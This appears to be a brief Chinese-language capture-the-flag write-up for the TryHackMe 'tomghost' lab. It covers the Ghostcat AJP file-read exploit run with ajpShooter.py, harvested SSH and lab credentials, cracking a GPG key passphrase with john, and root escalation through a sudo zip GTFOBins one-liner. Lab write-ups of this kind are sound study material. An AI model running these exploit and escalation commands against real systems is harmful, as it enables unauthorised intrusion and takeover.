tomghost
思路:
先使用端口扫描,会发现22,8009,8080
8009的考察点:tomcat ajp协程属性设置导致的文件读取和文件执行。
https://github.com/00theway/Ghostcat-CNVD-2020-10487
读取
python3.9 ajpShooter.py http://10.10.30.130:8080 8009 /WEB-INF/web.xml read
获得ssh登录
skyfuck:8730281lkjlkjdqlksalks
将文件下载到本地
scp skyfuck@10.10.30.130:credential.pgp .
爆破
gpg2john tryhackme.asc > hash.txt
john --wordlist=rockyou.txt hash
alexandru (tryhackme)
gpg解密
gpg --import tryhackme.asc
gpg --decrypt credebtial.pgp
得到
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
登录
sudo提权
https://gtfobins.github.io/gtfobins/zip/#sudo
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
此时root
回顾:8009这个漏洞,gpg解密